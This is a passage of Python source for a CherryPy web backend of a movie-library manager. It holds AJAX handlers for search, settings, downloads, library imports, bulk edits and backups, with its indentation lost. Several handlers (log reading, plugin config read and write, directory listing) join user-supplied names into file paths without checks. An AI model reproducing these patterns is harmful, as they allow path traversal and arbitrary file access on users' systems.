Gets a 25-movie slice from library sorted by sort key
Returns list of dicts of movies
'''
return core.sql.get_user_movies(sort_key, sort_direction.upper(), limit, offset, hide_finished=True if hide_finished == 'True' else False)
@cherrypy.expose
@cherrypy.tools.json_out()
def search_tmdb(self, search_term):
''' Search tmdb for movies
search_term (str): title and year of movie (Movie Title 2016)
Returns list of dicts that contain tmdb's data.
'''
results = TheMovieDatabase.search(search_term)
if not results:
logging.info('No Results found for {}'.format(search_term))
return results
@cherrypy.expose
@cherrypy.tools.json_out()
def tmdb_categories(self, cat, tmdbid=None):
''' Get categories of movies from TMDB
Returns list of dicts of movies
'''
return TheMovieDatabase.get_category(cat, tmdbid)[:8]
@cherrypy.expose
@cherrypy.tools.json_out()
def quick_titles(self):
return core.sql.quick_titles()
@cherrypy.expose
@cherrypy.tools.json_out()
def get_search_results(self, imdbid, quality=None):
''' Gets search results for movie
imdbid (str): imdb id #
quality (str): quality profile for movie <optional - default None>
Passes request to sql.get_search_results() then filters out unused download methods.
Returns dict ajax-style response
'''
results = core.sql.get_search_results(imdbid, quality=quality)
if not core.CONFIG['Downloader']['Sources']['usenetenabled']:
results = [res for res in results if res.get('type') != 'nzb']
if not core.CONFIG['Downloader']['Sources']['torrentenabled']:
results = [res for res in results if res.get('type') != 'torrent']
if not results:
ne = core.scheduler_plugin.task_list['Movie Search'].next_execution
ne = Conversions.human_datetime(ne) if ne else '[Disabled]'
return {'response': False, 'next': ne}
else:
for i in results:
i['size'] = Conversions.human_file_size(i['size'])
return {'response': True, 'results': results}
@cherrypy.expose
def get_trailer(self, title, year):
''' Gets trailer embed url from youtube
title (str): title of movie
year (str/int): year of movie release
Returns str
'''
return YouTube.trailer('{} {}'.format(title, year))
@cherrypy.expose
@cherrypy.tools.json_out()
def add_wanted_movie(self, data):
''' Adds movie to library
data (str): json-formatted dict of known movie data
Calls library.Manage.add_movie to add to library.
Returns dict ajax-style response
'''
movie = json.loads(data)
response = Manage.add_movie(movie, full_metadata=False)
if response['response'] and core.CONFIG['Search']['searchafteradd'] and movie['year'] != 'N/A':
threading.Thread(target=searcher._t_search_grab, args=(movie,)).start()
return response
@cherrypy.expose
@cherrypy.tools.json_out()
def save_settings(self, data):
''' Saves settings to config file
data (dict): of Section with nested dict of keys and values:
{'Section': {'key': 'val', 'key2': 'val2'}, 'Section2': {'key': 'val'}}
All dicts must contain the full tree or data will be lost.
Fires off additional methods if neccesary, ie scheduler restart/reloads
Returns dict ajax-style response
'''
logging.info('Saving settings.')
data = json.loads(data)
save_data = {}
for key in data:
if data[key] != core.CONFIG[key]:
save_data[key] = data[key]
if not save_data:
return {'response': True, 'message': _('Settings saved.')}
try:
config.write(save_data)
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e:
logging.error('Writing config.', exc_info=True)
return {'response': False, 'error': _('Unable to write to config file.')}
return {'response': True, 'message': _('Settings saved.')}
@cherrypy.expose
@cherrypy.tools.json_out()
def remove_movie(self, imdbid):
''' Removes movie
imdbid (str): imdb id #
Returns dict ajax-style response
'''
return Manage.remove_movie(imdbid)
@cherrypy.expose
@cherrypy.tools.json_out()
def delete_movie_file(self, imdbid):
''' Deletes movie file for imdbid
imdbid (str): imdb id #
Returns dict ajax-style response
'''
logging.info('Deleting file for {}.'.format(imdbid))
f = core.sql.get_movie_details('imdbid', imdbid).get('finished_file')
try:
logging.debug('Finished file for {} is {}'.format(imdbid, f))
os.unlink(f)
return {'response': True, 'message': _('Deleted movie file {}.').format(f)}
except Exception as e:
logging.error('Unable to delete file {}'.format(f), exc_info=True)
return {'response': False, 'error': str(e)}
@cherrypy.expose
@cherrypy.tools.json_out()
def search(self, imdbid):
''' Search indexers for specific movie.
imdbid (str): imdb id #
Gets movie data from database and sends to searcher.search()
Returns dict ajax-style response
'''
logging.info('Starting user-requested backlog search for {}'.format(imdbid))
movie = core.sql.get_movie_details('imdbid', imdbid)
if not movie:
return {'response': False, 'error': Errors.database_read.format(imdbid)}
else:
success = searcher.search(imdbid, movie['title'], movie['year'], movie['quality'])
status = core.sql.get_movie_details('imdbid', imdbid)['status']
if success:
results = core.sql.get_search_results(imdbid, movie['quality'])
for i in results:
i['size'] = Conversions.human_file_size(i['size'])
r = {'response': True, 'results': results, 'movie_status': status}
if len(results) == 0:
ne = core.scheduler_plugin.task_list['Movie Search'].next_execution
r['next'] = Conversions.human_datetime(ne) if ne else '[Disabled]'
return r
else:
return {'response': False, 'error': Errors.database_read.format(imdbid), 'movie_status': status}
@cherrypy.expose
@cherrypy.tools.json_out()
def manual_download(self, year, guid, kind):
''' Sends search result to downloader manually
guid (str): download link for nzb/magnet/torrent file.
kind (str): type of download (torrent, magnet, nzb)
Returns dict ajax-style response
'''
torrent_enabled = core.CONFIG['Downloader']['Sources']['torrentenabled']
usenet_enabled = core.CONFIG['Downloader']['Sources']['usenetenabled']
if kind == 'nzb' and not usenet_enabled:
return {'response': False, 'error': _('Link is NZB but no Usent client is enabled.')}
elif kind in ('torrent', 'magnet') and not torrent_enabled:
return {'response': False, 'error': _('Link is Torrent/Magnet but no Torrent client is enabled.')}
data = dict(core.sql.get_single_search_result('guid', guid))
if data:
data['year'] = year
return snatcher.download(data)
else:
return {'response': False, 'error': Errors.database_read.format(kind)}
@cherrypy.expose
@cherrypy.tools.json_out()
def mark_bad(self, guid, imdbid, cancel_download=False):
''' Marks guid as bad in SEARCHRESULTS and MARKEDRESULTS
guid (str): guid of download to mark
imdbid (str): imdb id # of movie
cancel_download (bool): send command to download client to cancel download
Returns dict ajax-style response
'''
sr_orig = core.sql.get_single_search_result('guid', guid)
sr = Manage.searchresults(guid, 'Bad')
Manage.markedresults(guid, 'Bad', imdbid=imdbid)
if sr:
response = {'response': True, 'message': _('Marked release as Bad.')}
else:
response = {'response': False, 'error': Errors.database_write}
response['movie_status'] = Manage.movie_status(imdbid)
if not response['movie_status']:
response['error'] = (Errors.database_write)
response['response'] = False
if cancel_download:
cancelled = False
if sr_orig.get('status') != 'Snatched':
return response
client = sr_orig['download_client'] if sr_orig else None
downloadid = sr_orig['downloadid'] if sr_orig else None
if not client:
logging.info('Download client not found, cannot cancel download.')
return response
else:
cancelled = getattr(downloaders, client).cancel_download(downloadid)
if not cancelled:
response['response'] = False
response['error'] = response.get('error', '') + _(' Could not remove download from client.')
return response
@cherrypy.expose
def notification_remove(self, index):
''' Removes notification from core.notification
index (str/int): index of notification to remove
'index' will be of type string since it comes from ajax request.
Therefore we convert to int here before passing to Notification
Simply calls Notification module.
Does not return
'''
notification.remove(int(index))
return
@cherrypy.expose
@cherrypy.tools.json_out()
def update_check(self):
''' Manually check for updates
Returns list:
[0] dict ajax-style response
[1] dict of core notifications
'''
response = core.updater.update_check()
if response['status'] == 'current':
n = [[{'message': _('No updates available.')}, {'type': 'primary'}]]
return [response, n]
else:
return [response, core.NOTIFICATIONS]
@cherrypy.expose
@cherrypy.tools.json_out()
def test_downloader_connection(self, mode, data):
''' Test connection to downloader.
mode (str): which downloader to test.
data (dict): connection information (url, port, login, etc)
Executes staticmethod in the chosen downloader's class.
Returns dict ajax-style response
'''
response = {}
data = json.loads(data)
test = getattr(downloaders, mode).test_connection(data)
if test is True:
response['response'] = True
response['message'] = _('Connection successful.')
else:
response['response'] = False
response['error'] = test
return response
@cherrypy.expose
def server_status(self, mode):
''' Check or modify status of CherryPy server_status
mode (str): command or request of state
Restarts or Shuts Down server in separate thread.
Delays by one second to allow browser to redirect.
If mode == 'online', asks server for status.
(ENGINE.started, ENGINE.stopped, etc.)
Returns nothing for mode == restart || shutdown
Returns str server state if mode == online
'''
if mode == 'restart':
threading.Timer(1, core.restart).start()
return
elif mode == 'shutdown':
threading.Timer(1, core.shutdown).start()
return
elif mode == 'online':
return str(cherrypy.engine.state)
@cherrypy.expose
def update_server(self, mode):
''' Starts and executes update process.
mode (str): 'set_true' or 'update_now'
This method has two major functions based on mode
set_true:
Sets core.UPDATING to True, the browser should then automatically redirect
the user to the update page that calls update_server('update_now')
update_now:
Starts update process:
* Stops task scheduler to cancel all Timers
* Waits for in-process tasks to finish. Yields to browser a list of
currently-running tasks every 1.5 seconds
* Yields updating message to browser. Calls update method
* Sets core.UPDATING to False
* Yields response from update method to browser
If False, starts scheduler plugin again to get back to a normal state
If True, calls restart method. Browser is responsible for redirecting
afer the server is back up.
Returns dict ajax-style response
'''
if mode == 'set_true':
core.UPDATING = True
return json.dumps({'response': True})
if mode == 'update_now':
logging.info('Update process started.')
core.scheduler_plugin.stop()
active_tasks = [k for k, v in core.scheduler_plugin.task_list.items() if v.running]
while len(active_tasks) > 0:
yield json.dumps({'response': True, 'status': 'waiting', 'active_tasks': active_tasks})
active_tasks = [k for k, v in core.scheduler_plugin.task_list.items() if v.running]
time.sleep(1.5)
yield json.dumps({'response': True, 'status': 'updating'})
update_status = core.updater.execute_update()
core.UPDATING = False
if update_status is False:
logging.error('Update Failed.')
yield json.dumps({'response': False, 'error': _('Unable to complete update.')})
core.scheduler_plugin.restart()
elif update_status is True:
yield json.dumps({'response': True, 'status': 'complete'})
self.server_status('restart')
else:
return json.dumps({'response': False})
update_server._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def update_movie_options(self, quality, status, filters, imdbid):
''' Updates quality settings for individual title
quality (str): name of new quality
status (str): management state ('automatic', 'disabled')
filters (str): JSON.stringified dict of filter words
imdbid (str): imdb identification number
Returns dict ajax-style response
'''
success = {'response': True, 'message': _('Movie options updated.')}
logging.info('Setting Quality and filters for {}.'.format(imdbid))
if not core.sql.update_multiple_values('MOVIES', {'quality': quality, 'filters': filters}, 'imdbid', imdbid):
return {'response': False, 'error': Errors.database_write}
logging.info('Updating status to {} for {}.'.format(status, imdbid))
if status == 'Automatic':
if not core.sql.update('MOVIES', 'status', 'Waiting', 'imdbid', imdbid):
return {'response': False, 'error': Errors.database_write}
new_status = Manage.movie_status(imdbid)
if not new_status:
return {'response': False, 'error': Errors.database_write}
else:
success['status'] = new_status
return success
elif status == 'Disabled':
if not core.sql.update('MOVIES', 'status', 'Disabled', 'imdbid', imdbid):
return {'response': False, 'error': Errors.database_write}
else:
success['status'] = 'Disabled'
return success
@cherrypy.expose
def get_log_text(self, logfile):
''' Gets log file contents
logfile (str): name of log file to read
logfile should be filename only, not the path to the file
Returns str
'''
logging.info('Dumping log file {} to text.'.format(logfile))
with open(os.path.join(core.LOG_DIR, logfile), 'r') as f:
log_text = ''.join(reversed(f.readlines()))
return log_text
@cherrypy.expose
@cherrypy.tools.json_out()
def indexer_test(self, indexer, apikey, mode):
''' Tests connection to newznab indexer
indexer (str): url of indexer
apikey (str): indexer's api key
mode (str): newznab or torznab
Returns dict ajax-style response
'''
if mode == 'newznab':
return newznab.NewzNab.test_connection(indexer, apikey)
elif mode == 'torznab':
return torrent.Torrent.test_connection(indexer, apikey)
else:
return {'response': False, 'error': _('Invalid test mode.')}
@cherrypy.expose
@cherrypy.tools.json_out()
def get_plugin_conf(self, folder, conf):
''' Calls plugin_conf_popup to render html
folder (str): folder to read config file from
conf (str): filename of config file (ie 'my_plugin.conf')
Returns string
'''
c = os.path.join(core.PLUGIN_DIR, folder, conf)
logging.info('Reading plugin config {}'.format(c))
try:
with open(c) as f:
config = json.load(f)
except Exception as e:
logging.error('Unable to read config file.', exc_info=True)
return ''
return plugins.render_config(config)
@cherrypy.expose
@cherrypy.tools.json_out()
def save_plugin_conf(self, folder, filename, config):
''' Calls plugin_conf_popup to render html
folder (str): folder to store config file
filename (str): filename of config file (ie 'my_plugin.conf')
config (str): json data to store in conf file
Returns dict ajax-style response
'''
conf_file = os.path.join(core.PROG_PATH, core.PLUGIN_DIR, folder, filename)
logging.info('Saving plugin config as {}'.format(conf_file))
config = json.loads(config)
response = {'response': True, 'message': _('Settings saved.')}
try:
with open(conf_file, 'w') as output:
json.dump(config, output, indent=2)
except Exception as e:
response = {'response': False, 'error': str(e)}
return response
@cherrypy.expose
def scan_library_directory(self, directory, minsize, recursive):
''' Calls library to scan directory for movie files
directory (str): directory to scan
minsize (str/int): minimum file size in mb, coerced to int
resursive (bool): whether or not to search subdirs
Finds all files larger than minsize in directory.
Removes all movies from gathered list that are already in library.
If error, yields {'error': reason} and stops Iteration
If movie has all metadata, yields:
{'complete': {<metadata>}}
If missing imdbid or resolution, yields:
{'incomplete': {<knownn metadata>}}
All metadata dicts include:
'path': 'absolute path to file'
'progress': '10 of 250'
Yeilds dict ajax-style response
'''
recursive = json.loads(recursive)
minsize = int(minsize)
files = core.library.ImportDirectory.scan_dir(directory, minsize, recursive)
if files.get('error'):
yield json.dumps({'error': files['error']})
raise StopIteration()
library = [i['imdbid'] for i in core.sql.get_user_movies()]
files = files['files']
length = len(files)
if length == 0:
yield json.dumps({'response': None})
raise StopIteration()
logging.info('Parsing {} directory scan results.'.format(length))
for index, path in enumerate(files):
logging.info('Gathering metatadata for {}'.format(path))
metadata = {}
response = {'progress': [index + 1, length]}
try:
metadata = Metadata.from_file(path)
if not metadata.get('imdbid'):
metadata['imdbid'] = ''
logging.info('IMDB unknown for import {}'.format(metadata['title']))
response['response'] = 'incomplete'
elif metadata['imdbid'] in library:
logging.info('{} ({}) already in library, ignoring.'.format(metadata['title'], path))
response['response'] = 'in_library'
elif not metadata.get('resolution'):
logging.info('Resolution/Source unknown for import {}'.format(metadata['title']))
response['response'] = 'incomplete'
else:
logging.info('All data found for import {}'.format(metadata['title']))
response['response'] = 'complete'
if response['response'] == 'complete':
p = metadata.get('poster_path')
r = metadata.get('resolution')
metadata = Metadata.convert_to_db(metadata)
metadata['poster_path'] = p
metadata['resolution'] = r
metadata['size'] = os.path.getsize(path)
metadata['human_size'] = Conversions.human_file_size(metadata['size'])
metadata['finished_file'] = path
if response['response'] == 'in_library':
metadata = {'title': metadata['title']}
response['movie'] = metadata
yield json.dumps(response)
except Exception as e:
logging.warning('Error gathering metadata.', exc_info=True)
yield json.dumps({'response': 'incomplete', 'movie': metadata})
continue
scan_library_directory._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def import_dir(self, movies, corrected_movies):
''' Imports list of movies in data
movie_data (list): dicts of movie info ready to import
corrected_movies (list): dicts of user-corrected movie info
corrected_movies must be [{'/path/to/file': {'known': 'metadata'}}]
Iterates through corrected_movies and attmpts to get metadata again if required.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yeilds dict ajax-style response
'''
logging.info('Adding directory scan movies to library.')
today = str(datetime.date.today())
movie_data = json.loads(movies)
corrected_movies = json.loads(corrected_movies)
fake_results = []
success = []
length = len(movie_data) + len(corrected_movies)
progress = 1
if corrected_movies:
logging.info('{} corrected movies, gathering metadata.'.format(len(corrected_movies)))
for data in corrected_movies:
tmdbdata = TheMovieDatabase._search_tmdbid(data['tmdbid'])
if tmdbdata:
tmdbdata = tmdbdata[0]
data['year'] = tmdbdata['release_date'][:4]
data.update(tmdbdata)
movie_data.append(data)
else:
logging.error('Unable to find {} on TMDB.'.format(data['tmdbid']))
yield json.dumps({'response': False, 'movie': data, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(data['tmdbid'])})
progress += 1
logging.info('Adding {} directory scan movies to library.'.format(len(movie_data)))
for movie in movie_data:
if movie.get('imdbid'):
movie['status'] = 'Disabled'
movie['predb'] = 'found'
movie['origin'] = 'Directory Import'
movie['finished_date'] = today
movie['id'] = movie['tmdbid']
response = Manage.add_movie(movie, full_metadata=True)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
else:
logging.error('Unable to find {} on TMDB.'.format(movie['title']))
logging.debug(movie)
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(data['title'])})
progress += 1
fake_results = searchresults.score(fake_results, imported=True)
for i in success:
for r in fake_results:
if r['imdbid'] == i['imdbid']:
core.sql.update('MOVIES', 'finished_score', r['score'], 'imdbid', i['imdbid'])
break
core.sql.write_search_results(fake_results)
import_dir._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def list_files(self, current_dir, move_dir):
''' Lists files in directory
current_dir (str): base path
move_dir (str): child path to read
Joins and normalizes paths:
('/home/user/movies', '..')
Becomes /home/user
Returns dict ajax-style response
'''
current_dir = current_dir.strip()
move_dir = move_dir.strip()
response = {}
new_path = os.path.normpath(os.path.join(current_dir, move_dir))
response['new_path'] = new_path
try:
response['list'] = [i for i in os.listdir(new_path) if os.path.isdir(os.path.join(new_path, i)) and not i.startswith('.')]
except Exception as e:
response = {'error': str(e)}
logging.error('Error listing directory.', exc_info=True)
return response
@cherrypy.expose
@cherrypy.tools.json_out()
def update_metadata(self, imdbid, tmdbid=None):
''' Re-downloads metadata for imdbid
imdbid (str): imdbid of movie
tmdbid (str): tmdbid of movie <optional - default None>
If tmdbid is None, looks in database for tmdbid using imdbid.
If that fails, looks on tmdb api for imdbid
If that fails returns error message
Returns dict ajax-style response
'''
r = Metadata.update(imdbid, tmdbid)
if r['response'] is True:
return {'response': True, 'message': _('Metadata updated.')}
else:
return r
@cherrypy.expose
@cherrypy.tools.json_out()
def single_movie_details(self, key, value):
''' Gets single movie's details from database
key (str): key for sql.get_movie_details
value (str): value for sql.get_movie_details
Returns dict
'''
return core.sql.get_movie_details(key, value)
@cherrypy.expose
@cherrypy.tools.json_out()
def set_movie_details(self, data):
''' Updates movie in database
data (dict): movie fields and values to update
data *must* include valid tmdbid
Returns dict
'''
data = json.loads(data)
tmdbid = data.pop('tmdbid')
if not core.sql.update_multiple_values('MOVIES', data, 'tmdbid', tmdbid):
return {'response': False, 'error': Errors.database_write}
else:
return {'response': True, 'message': 'Database Updated'}
@cherrypy.expose
@cherrypy.tools.json_out()
def get_kodi_movies(self, url):
''' Gets list of movies from kodi server
url (str): url of kodi server
Calls Kodi import method to gather list.
Returns dict ajax-style response
'''
return library.ImportKodiLibrary.get_movies(url)
@cherrypy.expose
def import_kodi_movies(self, movies):
''' Imports list of movies in movies from Kodi library
movie_data (str): json-formatted list of dicts of movies
Iterates through movies and gathers all required metadata.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yeilds dict ajax-style response
'''
movies = json.loads(movies)
fake_results = []
success = []
length = len(movies)
progress = 1
logging.info('Adding {} Kodi movies to library.'.format(length))
for movie in movies:
if not movie['imdbid']:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format("NONE")})
progress += 1
continue
tmdb_data = TheMovieDatabase._search_imdbid(movie['imdbid'])
if not tmdb_data or not tmdb_data[0].get('id'):
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(movie['imdbid'])})
progress += 1
continue
tmdb_data = tmdb_data[0]
movie['id'] = tmdb_data['id']
movie['size'] = 0
movie['status'] = 'Disabled'
movie['predb'] = 'found'
movie['finished_file'] = (movie.get('finished_file') or '').strip()
movie['origin'] = 'Kodi Import'
response = Manage.add_movie(movie)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'title': movie['title'], 'imdbid': movie['imdbid']})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'title': movie['title'], 'imdbid': movie['imdbid'], 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
fake_results = searchresults.score(fake_results, imported=True)
for i in success:
for r in fake_results:
if r['imdbid'] == i['imdbid']:
core.sql.update('MOVIES', 'finished_score', r['score'], 'imdbid', i['imdbid'])
break
core.sql.write_search_results(fake_results)
import_kodi_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def upload_plex_csv(self, file_input):
''' Recieves upload of csv from browser
file_input (b'str): csv file fo read
Reads/parses csv file into a usable dict
Returns dict ajax-style response
'''
try:
csv_text = file_input.file.read().decode('utf-8')
file_input.file.close()
except Exception as e:
logging.error('Unable to parse Plex CSV', exc_info=True)
return {'response': False, 'error': str(e)}
if csv_text:
return library.ImportPlexLibrary.read_csv(csv_text)
else:
return {'response': True, 'complete': [], 'incomplete': []}
@cherrypy.expose
def import_plex_csv(self, movies, corrected_movies):
''' Imports list of movies genrated by csv import
movie_data (list): dicts of movie info ready to import
corrected_movies (list): dicts of user-corrected movie info
Iterates through corrected_movies and attmpts to get metadata again if required.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yeilds dict ajax-style response
'''
movie_data = json.loads(movies)
corrected_movies = json.loads(corrected_movies)
fake_results = []
success = []
length = len(movie_data) + len(corrected_movies)
progress = 1
if corrected_movies:
logging.info('Adding {} Plex movies to library.'.format(len(corrected_movies)))
for movie in corrected_movies:
tmdbdata = TheMovieDatabase._search_imdbid(movie['imdbid'])
if tmdbdata:
tmdbdata = tmdbdata[0]
movie['year'] = tmdbdata['release_date'][:4]
movie.update(tmdbdata)
movie_data.append(movie)
else:
logging.error(Errors.tmdb_not_found.format(movie['imdbid']))
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(movie['imdbid'])})
progress += 1
logging.info('Adding {} Plex movies to library.'.format(length))
for movie in movie_data:
logging.info('Importing Plex movie {} {}'.format(movie.get('title', ''), movie.get('year', '')))
fm = False
if not movie.get('imdbid') and movie.get('tmdbid'):
tmdb_data = TheMovieDatabase._search_tmdbid(movie['tmdbid'])
if tmdb_data:
movie.update(tmdb_data[0])
fm = True
else:
yield json.dumps({'response': False, 'progress': [progress, length], 'title': movie['title'], 'error': Errors.tmdb_not_found.format(movie['tmdbid'])})
progress += 1
continue
if movie.get('imdbid'):
movie['status'] = 'Disabled'
movie['predb'] = 'found'
movie['origin'] = 'Plex Import'
if not movie.get('id'):
tmdb_data = TheMovieDatabase._search_imdbid(movie['imdbid'])
if tmdb_data:
movie.update(tmdb_data[0])
else:
yield json.dumps({'response': False, 'progress': [progress, length], 'title': movie['title'], 'error': Errors.tmdb_not_found.format(movie['imdbid'])})
progress += 1
continue
response = Manage.add_movie(movie, full_metadata=fm)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'title': movie['title'], 'imdbid': movie['imdbid']})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'progress': [progress, length], 'error': response['error'], 'title': movie['title']})
progress += 1
continue
else:
logging.error(Errors.tmdb_not_found.format(movie['title']))
yield json.dumps({'response': False, 'progress': [progress, length], 'error': _('Unable to find IMDB ID for {} on TheMovieDB.').format(movie['title']), 'title': movie['title']})
progress += 1
continue
if fake_results:
fake_results = searchresults.score(fake_results, imported=True)
for i in success:
for r in fake_results:
if r['imdbid'] == i['imdbid']:
core.sql.update('MOVIES', 'finished_score', r['score'], 'imdbid', i['imdbid'])
break
if fake_results:
core.sql.write_search_results(fake_results)
import_plex_csv._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def get_cp_movies(self, url, apikey):
''' Gets movies from CP server
url (str): url to cp server
apikey (str): cp api key
Reads/parses cp api response
Returns dict ajax-style response
'''
url = '{}/api/{}/movie.list/'.format(url, apikey)
if not url.startswith('http'):
url = 'http://{}'.format(url)
return library.ImportCPLibrary.get_movies(url)
@cherrypy.expose
def import_cp_movies(self, wanted, finished):
''' Imports movies from CP list to library
wanted (list): dicts of wanted movies
finished (list): dicts of finished movies
Yields dict ajax-style response
'''
wanted = json.loads(wanted)
finished = json.loads(finished)
fake_results = []
success = []
length = len(wanted) + len(finished)
progress = 1
logging.info('Adding {} Wanted CouchPotato movies to library.'.format(len(wanted)))
for movie in wanted:
response = Manage.add_movie(movie, full_metadata=True)
if response['response'] is True:
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
logging.info('Adding {} Wanted CouchPotato movies to library.'.format(len(finished)))
for movie in finished:
movie['predb'] = 'found'
movie['status'] = 'Disabled'
movie['origin'] = 'CouchPotato Import'
response = Manage.add_movie(movie, full_metadata=True)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
fake_results = searchresults.score(fake_results, imported=True)
for i in success:
for r in fake_results:
if r['imdbid'] == i['imdbid']:
core.sql.update('MOVIES', 'finished_score', r['score'], 'imdbid', i['imdbid'])
break
core.sql.write_search_results(fake_results)
import_cp_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_backlog_search(self, movies):
''' Bulk manager action for backlog search
movies (list): dicts of movies, must contain keys imdbid and tmdbid
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Performing bulk backlog search for {} movies.'.format(len(movies)))
ids = [i['imdbid'] for i in movies]
movies = [i for i in core.sql.get_user_movies() if i['imdbid'] in ids]
for i, movie in enumerate(movies):
title = movie['title']
year = movie['year']
imdbid = movie['imdbid']
year = movie['year']
quality = movie['quality']
logging.info('Performing backlog search for {} {}.'.format(title, year))
if not searcher.search(imdbid, title, year, quality):
response = {'response': False, 'error': Errors.database_write, 'imdbid': imdbid, 'index': i + 1}
else:
response = {'response': True, 'index': i + 1}
yield json.dumps(response)
manager_backlog_search._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_update_metadata(self, movies):
''' Bulk manager action for metadata update
movies (list): dicts of movies, must contain keys imdbid and tmdbid
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Performing bulk metadata update for {} movies.'.format(len(movies)))
for i, movie in enumerate(movies):
r = Metadata.update(movie.get('imdbid'), movie.get('tmdbid'))
if r['response'] is False:
response = {'response': False, 'error': r['error'], 'imdbid': movie['imdbid'], 'index': i + 1}
else:
response = {'response': True, 'index': i + 1}
yield json.dumps(response)
manager_update_metadata._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_change_quality(self, movies, quality):
''' Bulk manager action to change movie quality profile
movies (list): dicts of movies, must contain keys imdbid
quality (str): quality to set movies to
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Setting quality to {} for: {}'.format(quality, ', '.join(i['imdbid'] for i in movies)))
for i, movie in enumerate(movies):
if not core.sql.update('MOVIES', 'quality', quality, 'imdbid', movie['imdbid']):
response = {'response': False, 'error': Errors.database_write, 'imdbid': movie['imdbid'], 'index': i + 1}
else:
response = {'response': True, 'index': i + 1}
yield json.dumps(response)
manager_change_quality._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_reset_movies(self, movies):
''' Bulk manager action to reset movies
movies (list): dicts of movies, must contain key imdbid
Removes all search results
Updates database row with db_reset dict
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Resetting status for {} movies.'.format(len(movies)))
for i, movie in enumerate(movies):
logging.debug('Resetting {}'.format(movie['imdbid']))
imdbid = movie['imdbid']
if not core.sql.purge_search_results(imdbid):
yield json.dumps({'response': False, 'error': _('Unable to purge search results.'), 'imdbid': imdbid, 'index': i + 1})
continue
db_reset = {'quality': config.default_profile(),
'status': 'Waiting',
'finished_date': None,
'finished_score': None,
'backlog': 0,
'finished_file': None,
'predb': None,
'predb_backlog': None
}
if not core.sql.update_multiple_values('MOVIES', db_reset, 'imdbid', imdbid):
yield json.dumps({'response': False, 'error': Errors.database_write, 'imdbid': imdbid, 'index': i + 1})
continue
yield json.dumps({'response': True, 'index': i + 1})
manager_reset_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_remove_movies(self, movies):
''' Bulk action to remove movies
movies (list): dicts of movies, must contain key imdbid
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Removing {} movies from library.'.format(len(movies)))
for i, movie in enumerate(movies):
r = self.remove_movie(movie['imdbid'])
if r['response'] is False:
response = {'response': False, 'error': r['error'], 'imdbid': movie['imdbid'], 'index': i + 1}
else:
response = {'response': True, 'index': i + 1}
yield(json.dumps(response))
manager_remove_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def generate_stats(self):
''' Gets library stats for graphing page
Returns dict of library stats
'''
return Manage.get_stats()
@cherrypy.expose
@cherrypy.tools.json_out()
def create_backup(self):
''' Creates backup zip file ./watcher.zip
Returns dict ajax-style response
'''
logging.info('Creating backup of Watcher as {}'.format(os.path.join(core.PROG_PATH, 'watcher.zip')))
try:
backup.backup(require_confirm=False)
except Exception as e:
logging.error('Unable to create backup.', exc_info=True)
return {'response': False, 'error': str(e)}
return {'response': True, 'message': _('Backup created as {}').format(os.path.join(core.PROG_PATH, 'watcher.zip'))}
@cherrypy.expose
@cherrypy.tools.json_out()
def restore_backup(self, fileUpload):
logging.info('Restoring backup from uploaded zip.')
n = datetime.datetime.today().microsecond
tmp_zip = os.path.join(core.PROG_PATH, 'restore_{}.zip'.format(n))
try:
with open(tmp_zip, 'wb') as f:
f.seek(0)
f.write(fileUpload.file.read())
logging.info('Restore zip temporarily stored as {}.'.format(tmp_zip))
backup.restore(require_confirm=False, file=tmp_zip)
logging.info('Removing temporary zip {}'.format(tmp_zip))
os.unlink(tmp_zip)
except Exception as e:
